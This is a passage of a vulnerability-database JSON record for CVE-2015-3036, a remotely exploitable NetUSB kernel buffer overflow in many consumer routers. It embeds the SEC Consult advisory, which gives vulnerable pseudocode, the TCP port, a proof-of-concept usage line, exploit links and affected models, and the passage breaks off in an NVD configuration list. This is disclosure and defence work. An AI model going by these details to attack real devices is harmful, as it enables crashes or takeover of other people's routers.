"accessComplexity": "Low", "accessVector": "Network", "authentication": "None", "author": "NVD", "availabilityImpact": "Complete", "baseScore": 10.0, "confidentialityImpact": "Complete", "exploitabilityScore": null, "id": "CVE-2015-3036", "impactScore": null, "integrityImpact": "Complete", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "High", "trust": 0.9, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "MEDIUM", "accessVector": "ADJACENT NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "COMPLETE", "availabilityRequirement": "NOT DEFINED", "baseScore": 5.7, "collateralDamagePotential": "NOT DEFINED", "confidentialityImpact": "NONE", "confidentialityRequirement": "NOT DEFINED", "enviromentalScore": 3.7, "exploitability": "PROOF-OF-CONCEPT", "exploitabilityScore": 5.5, "id": "CVE-2015-3036", "impactScore": 6.9, "integrityImpact": "NONE", "integrityRequirement": "NOT DEFINED", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "remediationLevel": "WORKAROUND", "reportConfidence": "CONFIRMED", "severity": "MEDIUM", "targetDistribution": "MEDIUM", "trust": 0.8, "userInterationRequired": null, "vector_string": "AV:A/AC:M/Au:N/C:N/I:N/A:C", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "NVD", "id": "CVE-2015-3036", "trust": 1.8, "value": "HIGH" }, { "author": "NVD", "id": "CVE-2015-3036", "trust": 0.8, "value": "MEDIUM" }, { "author": "CNNVD", "id": "CNNVD-201505-429", "trust": 0.6, "value": "CRITICAL" }, { "author": "VULMON", "id": "CVE-2015-3036", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "CERT/CC", "id": "VU#177092" }, { "db": "VULMON", "id": "CVE-2015-3036" }, { "db": "JVNDB", "id": "JVNDB-2015-002741" }, { "db": "NVD", "id": "CVE-2015-3036" }, { "db": "CNNVD", "id": "CNNVD-201505-429" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Stack-based buffer overflow in the run_init_sbus function in the KCodes NetUSB module for the Linux kernel, as used in certain NETGEAR products, TP-LINK products, and other products, allows remote attackers to execute arbitrary code by providing a long computer name in a session on TCP port 20005. KCodes NetUSB is vulnerable to a buffer overflow via the network that may result in a denial of service or code execution. KCodes NetUSB The kernel driver contains a buffer overflow vulnerability. KCodes NetUSB Is Linux Connected to base embedded devices (home router products, etc.) USB Share devices on the network \"USB over IP\" To realize the function, Linux Kernel module. Buffer overflow (CWE-120) - CVE-2015-3036 http://cwe.mitre.org/data/definitions/120.html The client NetUSB The data to send when connecting to the server NetUSB A buffer overflow can occur because the kernel driver does not validate properly. For more information SEC Consult Please check the advisory for. SEC Consult Vulnerability Lab Security Advisory \u003c 20150519-0 \u003e https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20150519-0_KCodes_NetUSB_Kernel_Stack_Buffer_Overflow_v10.txt In addition, National Vulnerability Database (NVD) Then CWE-119 It is published as CWE-119: Improper Restriction of Operations within the Bounds of a Memory Buffer ( Buffer error ) http://cwe.mitre.org/data/definitions/119.htmlAn attacker on the local network caused a buffer overflow, resulting in a denial of service operation (DoS) An attacker may be able to attack or execute arbitrary code. Depending on the default settings of the device, a remote attack may be possible. KCodes NetUSB is prone to a buffer-overflow vulnerability because it fails to adequately bounds-check user-supplied data before copying it to an insufficiently sized memory buffer. \nAn attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts may result in a denial-of-service condition. SEC Consult Vulnerability Lab Security Advisory \u003c 20150519-0 \u003e\n=======================================================================\n title: Kernel Stack Buffer Overflow\n product: KCodes NetUSB\n vulnerable version: see Vulnerable / tested versions\n fixed version: see Solution\n CVE number: CVE-2015-3036, VU#177092\n impact: Critical\n homepage: http://www.kcodes.com/\n found: 2015-02-23\n by: Stefan Viehb\u00f6ck (Office Vienna)\n SEC Consult Vulnerability Lab\n\n An integrated part of SEC Consult\n Berlin - Frankfurt/Main - Montreal - Singapore\n Vienna (HQ) - Vilnius - Zurich\n\n https://www.sec-consult.com\n\n=======================================================================\n\nVendor description:\n-------------------\n\"The world\u0027s premier technology provider of mobile printing, audio and\nvideo communication, file sharing, and USB applications for iPhones,\niPads, smart phones and tablets (Android and Windows), MacBooks, and\nUltrabooks.\"\n\nSource: http://www.kcodes.com/\n\n\nVulnerability overview/description:\n-----------------------------------\nNetUSB suffers from a remotely exploitable kernel stack buffer overflow. \nBecause of insufficient input validation, an overly long computer name can be\nused to overflow the \"computer name\" kernel stack buffer. This results in\nmemory corruption which can be turned into arbitrary remote code execution. \n\nFurthermore, a more detailed summary of this advisory has been published at our\nblog: http://blog.sec-consult.com\n\n\nProof of concept:\n-----------------\nBelow is an excerpt from the vulnerable run_init_sbus() function (pseudo code):\n\nint computername_len;\nchar computername_buf[64];\n// connection initiation, handshake\nlen = ks_recv(sock, \u0026computername_len, 4, 0);\n// ... \nlen = ks_recv(sock, computername_buf, computername_len, 0); // boom!\n\nA proof of concept \"netusb_bof.py\" has been developed which exploits the\nvulnerability. The PoC DoS exploit will not be published as many vendors\ndid not patch the vulnerability yet. \n\nExample use that results in denial-of-service (kernel memory corruption that\nresults in a device reboot):\n./netusb_bof.py 192.168.1.1 20005 500\n\n\nVulnerable / tested versions:\n-----------------------------\nThe vulnerability has been verified to exist in most recent firmware versions\nof the following devives:\n\nTP-Link TL-WDR4300 V1\nTP-Link WR1043ND v2\nNETGEAR WNDR4500\n\nFurthermore we\u0027ve identified NetUSB in the most recent firmware version of the\nfollowing products (list is not necessarily complete!):\nD-Link DIR-615 C\nNETGEAR AC1450\nNETGEAR CENTRIA (WNDR4700/4720)\nNETGEAR D6100\nNETGEAR D6200\nNETGEAR D6300\nNETGEAR D6400\nNETGEAR DC112A\nNETGEAR DC112A (Zain)\nNETGEAR DGND4000\nNETGEAR EX6200\nNETGEAR EX7000\nNETGEAR JNR3000\nNETGEAR JNR3210\nNETGEAR JR6150\nNETGEAR LG6100D\nNETGEAR PR2000\nNETGEAR R6050\nNETGEAR R6100\nNETGEAR R6200\nNETGEAR R6200v2\nNETGEAR R6220\nNETGEAR R6250\nNETGEAR R6300v1\nNETGEAR R6300v2\nNETGEAR R6700\nNETGEAR R7000\nNETGEAR R7500\nNETGEAR R7900\nNETGEAR R8000\nNETGEAR WN3500RP\nNETGEAR WNDR3700v5\nNETGEAR WNDR4300\nNETGEAR WNDR4300v2\nNETGEAR WNDR4500\nNETGEAR WNDR4500v2\nNETGEAR WNDR4500v3\nNETGEAR XAU2511\nNETGEAR XAUB2511\nTP-LINK Archer C2 V1.0 (Fix planned before 2015/05/22)\nTP-LINK Archer C20 V1.0 (Not affected)\nTP-LINK Archer C20i V1.0 (Fix planned before 2015/05/25)\nTP-LINK Archer C5 V1.2 (Fix planned before 2015/05/22)\nTP-LINK Archer C5 V2.0 (Fix planned before 2015/05/30)\nTP-LINK Archer C7 V1.0 (Fix planned before 2015/05/30)\nTP-LINK Archer C7 V2.0 (Fix already released)\nTP-LINK Archer C8 V1.0 (Fix planned before 2015/05/30)\nTP-LINK Archer C9 V1.0 (Fix planned before 2015/05/22)\nTP-LINK Archer D2 V1.0 (Fix planned before 2015/05/22)\nTP-LINK Archer D5 V1.0 (Fix planned before 2015/05/25)\nTP-LINK Archer D7 V1.0 (Fix planned before 2015/05/25)\nTP-LINK Archer D7B V1.0 (Fix planned before 2015/05/31)\nTP-LINK Archer D9 V1.0 (Fix planned before 2015/05/25)\nTP-LINK Archer VR200v V1.0 (Fix already released)\nTP-LINK TD-VG3511 V1.0 (End-Of-Life)\nTP-LINK TD-VG3631 V1.0 (Fix planned before 2015/05/30)\nTP-LINK TD-VG3631 V1.0 (Fix planned before 2015/05/31)\nTP-LINK TD-W1042ND V1.0 (End-Of-Life)\nTP-LINK TD-W1043ND V1.0 (End-Of-Life)\nTP-LINK TD-W8968 V1.0 (Fix planned before 2015/05/30)\nTP-LINK TD-W8968 V2.0 (Fix planned before 2015/05/30)\nTP-LINK TD-W8968 V3.0 (Fix planned before 2015/05/25)\nTP-LINK TD-W8970 V1.0 (Fix planned before 2015/05/30)\nTP-LINK TD-W8970 V3.0 (Fix already released)\nTP-LINK TD-W8970B V1.0 (Fix planned before 2015/05/30)\nTP-LINK TD-W8980 V3.0 (Fix planned before 2015/05/25)\nTP-LINK TD-W8980B V1.0 (Fix planned before 2015/05/30)\nTP-LINK TD-W9980 V1.0 (Fix already released)\nTP-LINK TD-W9980B V1.0 (Fix planned before 2015/05/30)\nTP-LINK TD-WDR4900 V1.0 (End-Of-Life)\nTP-LINK TL-WR1043ND V2.0 (Fix planned before 2015/05/30)\nTP-LINK TL-WR1043ND V3.0 (Fix planned before 2015/05/30)\nTP-LINK TL-WR1045ND V2.0 (Fix planned before 2015/05/30)\nTP-LINK TL-WR3500 V1.0 (Fix planned before 2015/05/22)\nTP-LINK TL-WR3600 V1.0 (Fix planned before 2015/05/22)\nTP-LINK TL-WR4300 V1.0 (Fix planned before 2015/05/22)\nTP-LINK TL-WR842ND V2.0 (Fix planned before 2015/05/30)\nTP-LINK TL-WR842ND V1.0 (End-Of-Life)\nTP-LINK TX-VG1530(GPON) V1.0 (Fix planned before 2015/05/31)\nTrendnet TE100-MFP1 (v1.0R)\nTrendnet TEW-632BRP (A1.0R)\nTrendnet TEW-632BRP (A1.1R/A1.2R)\nTrendnet TEW-632BRP (A1.1R/A1.2R/A1.3R)\nTrendnet TEW-634GRU (v1.0R)\nTrendnet TEW-652BRP (V1.0R)\nTrendnet TEW-673GRU (v1.0R)\nTrendnet TEW-811DRU (v1.0R)\nTrendnet TEW-812DRU (v1.0R)\nTrendnet TEW-812DRU (v2.xR)\nTrendnet TEW-813DRU (v1.0R)\nTrendnet TEW-818DRU (v1.0R)\nTrendnet TEW-823DRU (v1.0R)\nTrendnet TEW-MFP1 (v1.0R)\nZyxel NBG-419N v2\nZyxel NBG4615 v2\nZyxel NBG5615\nZyxel NBG5715\n\nBased on information embedded in KCodes drivers we believe the following\nvendors are affected:\nAllnet\nAmbir Technology\nAMIT\nAsante\nAtlantis\nCorega\nDigitus\nD-Link\nEDIMAX\nEncore Electronics\nEngenius\nEtop\nHardlink\nHawking\nIOGEAR\nLevelOne\nLongshine\nNETGEAR\nPCI\nPROLiNK\nSitecom\nTaifa\nTP-LINK\nTRENDnet\nWestern Digital\nZyXEL\n\n\nVendor contact timeline:\n------------------------\n2015-02-28: Contacting vendor through support@kcodes.com\n2015-03-04: No response, contacting various KCodes addresses found on the web. \n2015-03-05: Vendor responds, requests more information. \n2015-03-05: Providing advisory and proof of concept exploit. \n2015-03-16: No response, requesting status update. \n2015-03-16: Vendor responds, asks about fix verification(?)\n2015-03-16: Requesting clarification about fixing status and information about\n next steps. Proposing conference call dates. \n2015-03-19: No response, informing that notification of CERT/CC and selected\n vendors will start shortly. Requesting clarification about fixing\n status and information about next steps again. \n2015-03-19: Vendor responds, confirms conference call date (2015-03-25). No\n further information provided. \n2015-03-19: Providing advisory and proof of concept exploit to TP-LINK and\n NETGEAR. \n2015-03-25: Vendor cancels conference call on short notice (sudden week-long\n business trip). \n2015-03-26: Asking for support of CERT/CC regarding vendor coordination. \n2015-03 - 2015-05: Coordination between CERT \u0026 vendors, NETGEAR and TP-LINK\n2015-05-13: Notifying German CERT-Bund and Austrian CERT.at\n2015-05-19: Coordinated release of security advisory\n\n\nSolution:\n---------\nTP-LINK has started releasing fixed firmware. The status of affected products\ncan be found in the affected product list above. \n\nFor additional information also see CERT/CC vulnerability notice:\nhttp://www.kb.cert.org/vuls/id/177092\n\n\nWorkaround:\n-----------\nSometimes NetUSB can be disabled via the web interface, but at least on NETGEAR\ndevices this does not mitigate the vulnerability. NETGEAR told us, that there is\nno workaround available, the TCP port can\u0027t be firewalled nor is there a way to\ndisable the service on their devices. It\nensures the continued knowledge gain of SEC Consult in the field of network\nand application security to stay ahead of the attacker. The SEC Consult\nVulnerability Lab supports high-quality penetration testing and the evaluation\nof new offensive and defensive technologies for our customers. Hence our\ncustomers obtain the most current information about vulnerabilities and valid\nrecommendation about the risk profile of new technologies. \n\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\nInterested to work with the experts of SEC Consult?\nSend us your application https://www.sec-consult.com/en/Career.htm\n\nInterested in improving your cyber security with the experts of SEC Consult?\nContact our local offices https://www.sec-consult.com/en/About/Contact.htm\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nMail: research at sec-consult dot com\nWeb: https://www.sec-consult.com\nBlog: http://blog.sec-consult.com\nTwitter: https://twitter.com/sec_consult\n\nEOF Stefan Viehb\u00f6ck / @2015\n\n", "sources": [ { "db": "NVD", "id": "CVE-2015-3036" }, { "db": "CERT/CC", "id": "VU#177092" }, { "db": "JVNDB", "id": "JVNDB-2015-002741" }, { "db": "BID", "id": "74724" }, { "db": "VULMON", "id": "CVE-2015-3036" }, { "db": "PACKETSTORM", "id": "131987" } ], "trust": 2.79 }, "exploit_availability": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=38566", "trust": 0.2, "type": "exploit" } ], "sources": [ { "db": "VULMON", "id": "CVE-2015-3036" } ] }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2015-3036", "trust": 3.7 }, { "db": "CERT/CC", "id": "VU#177092", "trust": 3.7 }, { "db": "BID", "id": "74724", "trust": 1.4 }, { "db": "PACKETSTORM", "id": "131987", "trust": 1.2 }, { "db": "SECTRACK", "id": "1032377", "trust": 1.1 }, { "db": "PACKETSTORM", "id": "133919", "trust": 1.1 }, { "db": "EXPLOIT-DB", "id": "38566", "trust": 1.1 }, { "db": "EXPLOIT-DB", "id": "38454", "trust": 1.1 }, { "db": "JVN", "id": "JVNVU90185396", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2015-002741", "trust": 0.8 }, { "db": "CNNVD", "id": "CNNVD-201505-429", "trust": 0.6 }, { "db": "DLINK", "id": "SAP10057", "trust": 0.3 }, { "db": "VULMON", "id": "CVE-2015-3036", "trust": 0.1 } ], "sources": [ { "db": "CERT/CC", "id": "VU#177092" }, { "db": "VULMON", "id": "CVE-2015-3036" }, { "db": "BID", "id": "74724" }, { "db": "JVNDB", "id": "JVNDB-2015-002741" }, { "db": "PACKETSTORM", "id": "131987" }, { "db": "NVD", "id": "CVE-2015-3036" }, { "db": "CNNVD", "id": "CNNVD-201505-429" } ] }, "id": "VAR-201505-0408", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.5403467833333333 }, "last_update_date": "2023-12-18T13:09:11.017000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "USB Over IP (NetUSB)", "trust": 0.8, "url": "http://www.kcodes.com/product/usb_01.html" }, { "title": "The Register", "trust": 0.2, "url": "https://www.theregister.co.uk/2015/05/20/netusb_router_fail/" }, { "title": "TD-W8970-NetUSB-Fix-v1-", "trust": 0.1, "url": "https://github.com/leproide/td-w8970-netusb-fix-v1- " }, { "title": "NetUSB-exploit", "trust": 0.1, "url": "https://github.com/funsecurity/netusb-exploit " }, { "title": "MiraiSecurity", "trust": 0.1, "url": "https://github.com/pandazheng/miraisecurity " }, { "title": "Threatpost", "trust": 0.1, "url": "https://threatpost.com/details-surface-on-unpatched-kcodes-netusb-bug/112910/" } ], "sources": [ { "db": "VULMON", "id": "CVE-2015-3036" }, { "db": "JVNDB", "id": "JVNDB-2015-002741" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-119", "trust": 1.8 }, { "problemtype": "CWE-Other", "trust": 0.8 } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2015-002741" }, { "db": "NVD", "id": "CVE-2015-3036" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 3.6, "url": "https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20150519-0_kcodes_netusb_kernel_stack_buffer_overflow_v10.txt" }, { "trust": 3.3, "url": "http://blog.sec-consult.com/2015/05/kcodes-netusb-how-small-taiwanese.html" }, { "trust": 2.9, "url": "http://www.kb.cert.org/vuls/id/177092" }, { "trust": 1.2, "url": "http://www.securityfocus.com/bid/74724" }, { "trust": 1.2, "url": "https://www.exploit-db.com/exploits/38566/" }, { "trust": 1.1, "url": "http://securityadvisories.dlink.com/security/publication.aspx?name=sap10057" }, { "trust": 1.1, "url": "http://packetstormsecurity.com/files/131987/kcodes-netusb-buffer-overflow.html" }, { "trust": 1.1, "url": "http://seclists.org/fulldisclosure/2015/may/74" }, { "trust": 1.1, "url": "http://www.securitytracker.com/id/1032377" }, { "trust": 1.1, "url": "http://packetstormsecurity.com/files/133919/netusb-stack-buffer-overflow.html" }, { "trust": 1.1, "url": "http://seclists.org/fulldisclosure/2015/oct/50" }, { "trust": 1.1, "url": "https://www.exploit-db.com/exploits/38454/" }, { "trust": 0.8, "url": "http://kb.netgear.com/app/answers/detail/a_id/28393/" }, { "trust": 0.8, "url": "http://www.trendnet.com/support/view.asp?cat=4\u0026id=58" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-3036" }, { "trust": 0.8, "url": "http://jvn.jp/vu/jvnvu90185396/index.html" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2015-3036" }, { "trust": 0.3, "url": "http://www.kcodes.com/product/usb_01.html" }, { "trust": 0.3, "url": "https://github.com/funsecurity/netusb-exploit" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/119.html" }, { "trust": 0.1, "url": "https://github.com/leproide/td-w8970-netusb-fix-v1-" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://www.sec-consult.com/en/career.htm" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3036" }, { "trust": 0.1, "url": "https://www.sec-consult.com" }, { "trust": 0.1, "url": "https://www.sec-consult.com/en/about/contact.htm" }, { "trust": 0.1, "url": "https://twitter.com/sec_consult" }, { "trust": 0.1, "url": "http://blog.sec-consult.com" }, { "trust": 0.1, "url": "http://www.kcodes.com/" }, { "trust": 0.1, "url": "https://www.sec-consult.com/en/vulnerability-lab/advisories.htm" } ], "sources": [ { "db": "CERT/CC", "id": "VU#177092" }, { "db": "VULMON", "id": "CVE-2015-3036" }, { "db": "BID", "id": "74724" }, { "db": "JVNDB", "id": "JVNDB-2015-002741" }, { "db": "PACKETSTORM", "id": "131987" }, { "db": "NVD", "id": "CVE-2015-3036" }, { "db": "CNNVD", "id": "CNNVD-201505-429" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "CERT/CC", "id": "VU#177092" }, { "db": "VULMON", "id": "CVE-2015-3036" }, { "db": "BID", "id": "74724" }, { "db": "JVNDB", "id": "JVNDB-2015-002741" }, { "db": "PACKETSTORM", "id": "131987" }, { "db": "NVD", "id": "CVE-2015-3036" }, { "db": "CNNVD", "id": "CNNVD-201505-429" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2015-05-19T00:00:00", "db": "CERT/CC", "id": "VU#177092" }, { "date": "2015-05-21T00:00:00", "db": "VULMON", "id": "CVE-2015-3036" }, { "date": "2015-05-19T00:00:00", "db": "BID", "id": "74724" }, { "date": "2015-05-21T00:00:00", "db": "JVNDB", "id": "JVNDB-2015-002741" }, { "date": "2015-05-21T14:44:44", "db": "PACKETSTORM", "id": "131987" }, { "date": "2015-05-21T01:59:27.087000", "db": "NVD", "id": "CVE-2015-3036" }, { "date": "2015-05-21T00:00:00", "db": "CNNVD", "id": "CNNVD-201505-429" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2015-06-05T00:00:00", "db": "CERT/CC", "id": "VU#177092" }, { "date": "2016-12-08T00:00:00", "db": "VULMON", "id": "CVE-2015-3036" }, { "date": "2015-12-08T22:03:00", "db": "BID", "id": "74724" }, { "date": "2015-05-22T00:00:00", "db": "JVNDB", "id": "JVNDB-2015-002741" }, { "date": "2016-12-08T03:08:21.660000", "db": "NVD", "id": "CVE-2015-3036" }, { "date": "2015-05-21T00:00:00", "db": "CNNVD", "id": "CNNVD-201505-429" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201505-429" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "KCodes NetUSB kernel driver is vulnerable to buffer overflow", "sources": [ { "db": "CERT/CC", "id": "VU#177092" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "buffer overflow", "sources": [ { "db": "CNNVD", "id": "CNNVD-201505-429" } ], "trust": 0.6 } }
Vulnerability from fkie_nvd
{ "configurations": [ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:netgear:ac1450_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "32794415-73D5-4C63-BCAB-FA324BBCE850", "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:netgear:ac1450:-:*:*:*:*:*:*:*", "matchCriteriaId": "E4BA18B2-8234-4C26-B865-741D467C5EBE", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:netgear:c6300_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "4DC0FCBB-5F1B-417C-8E4B-FBD403CF2E38", "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:netgear:c6300:-:*:*:*:*:*:*:*", "matchCriteriaId": "7185DE0B-B15C-417D-9AF5-FBF15F9C2241", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:netgear:d1500_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "56141687-D086-4EEE-9F8A-C238CC26854E", "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:netgear:d1500:-:*:*:*:*:*:*:*", "matchCriteriaId": "78DC8809-C26D-48D8-9E12-228C3669B824", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:netgear:d3600_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "B175146A-AA48-4A89-9712-E87BBB0B389F", "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:netgear:d3600:-:*:*:*:*:*:*:*", "matchCriteriaId": "31DE9D4E-3CDC-4552-A63F-DD5D95E23F63", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:netgear:d500_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "DD7FA616-CD66-488A-92ED-3F28954F9E45", "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:netgear:d500:-:*:*:*:*:*:*:*", "matchCriteriaId": "3CE070E3-C0B1-455F-83A9-5C60C489816F", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:netgear:d6000_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "D53F8CC0-F707-4F98-85CE-9A816BE39809", "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:netgear:d6000:-:*:*:*:*:*:*:*", "matchCriteriaId": "6F6EA344-FF99-4F27-9860-3C5BE07345A7", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:netgear:d6100_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "8D349BA3-DF82-4DD5-BDA6-6AB5F3B70BD3", "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:netgear:d6100:-:*:*:*:*:*:*:*", "matchCriteriaId": "7EFD1E86-F100-4E46-935D-903EB6FEFE9D", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:netgear:d6200_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "F22E4FA5-DB96-4946-86B1-0D18A3BEBB2A", "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:netgear:d6200:-:*:*:*:*:*:*:*", "matchCriteriaId": "00E6A1B7-4732-4259-9B71-10FF0B56A16B", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:netgear:d6200b_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "DFEBB6A6-EABA-4A04-8B49-3C9F64D7C5C6", "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:netgear:d6200b:-:*:*:*:*:*:*:*", "matchCriteriaId": "60FAC76D-96D6-41FB-8EE8-C25F3CBB3307", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:netgear:d6300_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "2EC71979-23F7-4623-BE4A-82713E95DACD", "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:netgear:d6300:-:*:*:*:*:*:*:*", "matchCriteriaId": "78542C95-85CC-43E5-9F0E-B12DDD5B79C4", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:netgear:d6300b_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "357F14D2-06B8-4BA5-9D7E-B334F59C7250", "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:netgear:d6300b:-:*:*:*:*:*:*:*", "matchCriteriaId": "37B89703-CAFB-43F6-8880-90349F8ED856", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:netgear:dgn1000_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "BEFBB234-2155-45F8-933D-93E89EC1F54F", "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:netgear:dgn1000:v3:*:*:*:*:*:*:*", "matchCriteriaId": "430497AE-7C43-400E-9C70-001B2DA23B67", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:netgear:dgn2200_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "769065AA-BC73-4674-87B0-3D514FEFDBEF", "versionEndExcluding": "2017-01-06", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": 